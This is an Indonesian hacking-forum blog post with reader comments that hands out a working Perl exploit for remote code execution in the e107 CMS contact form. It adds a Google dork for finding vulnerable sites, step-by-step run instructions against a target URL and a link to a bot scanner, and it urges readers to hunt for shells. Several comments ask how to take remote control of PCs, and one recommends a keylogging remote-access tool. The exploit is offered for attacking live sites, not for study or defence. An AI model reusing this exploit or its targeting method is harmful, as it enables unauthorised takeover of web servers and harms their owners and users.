e107 Remote Code Execution + Scanner

19 July 2010
Penulis: UtuH · Kategori Artikel: Cracking

Hallo Semua, Kembali Lagi Dengan Mencari Target Shell. Banyak Yang Minta Target Di Channel, Tapi So Far It’s OK lah Yuk nyari target dengan e107 bug dork. Jangan lupa install perl di komputer anda / server anda / shell anda (PENTING). Berikut ini adalah Exploitnya, copy dan simpan di file bernama: “e107-binushacker.pl” # Exploit Title: e107 Code Exec

# Date: 05/22/10

# Author: McFly@e107.org

# Software Link: http://e107.org/edownload.php

# Version: e107 <= 0.7.20

# Tested on: Linux/Windows

#!/usr/bin/perl -w

#################################################

# e107 Code Exec // SploitAuthor: McFly@e107.org

#################################################

# These scrubs still haven't released an update!

# Here is a little bit of motivation for them to

# patch one of the most popular, and insecure of

# the PHP web apps available today.

#################################################

# DORK: inurl:e107_plugins

#################################################

use LWP::UserAgent;

my $path = $ARGV[0] or die("Gunakan Perintah: perl e107-binushacker.pl http://e107site/pathto/contact.php\n");

my $load = 'passthru(chr(105).chr(100))'; # Simple 'id' command. Put ur PHP payload here!

# Remove comment for proxy support

my $proxy = 'http://127.0.0.1:8118/';

$ENV{http_proxy} = $proxy ? $proxy: 0;

$ua = new LWP::UserAgent;

$ua->agent("Mozilla/5.0");

if ( $proxy )

{

print "[*] Using proxy $proxy \n";

$ua->env_proxy('1');

}

my $req = new HTTP::Request POST => $path;

$req->content_type('application/x-www-form-urlencoded');

$req->content("send-contactus=1&author_name=%5Bphp%5D$load%3Bdie%28%29%3B%5B%2Fphp%5D");

my $res = $ua->request($req);

my $data = $res->as_string;

if ( $data =~ /<td class=["']main_section['"]>(.*)/ )

{

$data = $1;

print "$data\n";

}

else

{

print "$data\n";

}

Setelah code tersebut dibuat, maka jalankan di directory active run perl shell / command prompt anda dengan dengan perintah: perl e107-binushacker.pl http://www.targetanda.com/pathnya/contact.php

Adapun Cara Lain Manual Bisa Dilihat (Video) Berikut:

Lihat Videonya Disini: HERE

Download it: HERE

Cara Lebih Mudah Lagi Dengan Menjalankan BOT SCANNER: Silakan Kunjungi #BINUSHACKER di IRC.DAL.NET untuk lebih detailnya & Tanyakan Langsung Ke Staff Yang Sedang Online.

Source Instant Download Bot Scanner: http://www.shantykooroostvaarders.nl/includes/js/tabs/bnshckr/

Selamat menikmati & semoga berhasil

Tags: BinusHacker, e107, Remote Code Execution, Tools

Komentar

15 Komentar Untuk “e107 Remote Code Execution + Scanner”
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

BonDaN pada 20 July 2010 6:16 am
Mantap juragan!
Thanks buat infonya
Target banyak coy..
Hajarrrr…
i-one pada 21 July 2010 11:25 am
keren juragan….
Ajix Crew pada 22 July 2010 3:02 am
bagus …….
zian pada 23 July 2010 11:21 am
gak pertamax, yg penting page one.. wkwkkw
moey147 pada 25 July 2010 12:06 am
nice Om !!!
Lanjut kahn !
[Black]__ pada 24 August 2010 10:39 am
GAK NGERTI COY
indra pada 1 September 2010 8:57 pm
keren juga caranya…nyoba ah…thx kk
BaRu BELAJar HaCkER (newbie) pada 16 September 2010 3:24 pm
asskum…
lamkenal…
mau tanya nich
itu awal code’a d tulis dri mana
n d copas di notepad or yg lain
n cohtoh gunainnya gmana…
klo buat remote blog bisa gak
ksih pencerahan dunk bos
aye msih newbie banget nich
BaRu BELAJar HaCkER (newbie) pada 16 September 2010 3:27 pm
klo buat ngeremote pc gmana yach caranya
beri tahu qu dunk bos
aye mau banget blajar itu
tolong d postingin yach or kirim via email aye jach yach…
saya pada 20 October 2010 2:38 am
hmm maksudnya gimana ya>? masih belum ngerti.. remotekah?>>
ocunk pada 11 February 2011 6:05 am
mmm… remote ya… gmn nh.. abis baterenya.. ma udah rusak sensornya….
iko mencret pada 10 March 2011 11:26 am
kkkkkkkkkkkkkkkkkkkkkkkk
kkkkkkkkkkkkkkkkkkkkkkkkkkkkk
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
18U pada 18 March 2011 4:10 pm
ad team viewer and pro rat klo mau remot yg bgus gunain prorat ad keylogernya :O
ByroeNet pada 26 March 2011 6:53 am
itu kan bot byroenet kenapa jadi binus hacker ya codingnya? ripper yaaaa
UtuH pada 26 March 2011 10:22 am
@ByroeNet:
Saya akan coba menjawab satu persatu:
1. Kebetulan saya mengambil sourcenya yang sudah di publikasikan dari exploid-db, silakan baca disini:
http://www.exploit-db.com/exploits/12715/
Mungkin ini yang disebut BOT dari ByroeNet:
http://pastebin.com/LSnGP06c
Modified by BaMby – irc.byroe.net
2. Dengan spirit ingin berbagi kepada semua orang di BinusHacker, saya menyimpan exploit tersebut (save to local computer) dengan nama e107-binushacker.pl. Sehingga ada sedikit perubahan dalam petunjuk command untuk menjalankan exploit, karena hal tersebut sehingga terdapat sedikit perubahan code, anda bisa melihat pada line $my path.
3. Code tersebut juga sudah menunjukkan author dari exploit ini & dapat saya disimpulkan bahwa exploit yang sudah di publikasi bisa dimodifikasi dengan tetap menyertakan author.
Jika ada yang masih kurang jelas bisa contact saya di:
utuh@binushacker.org
Keep Sharing All & Cheers..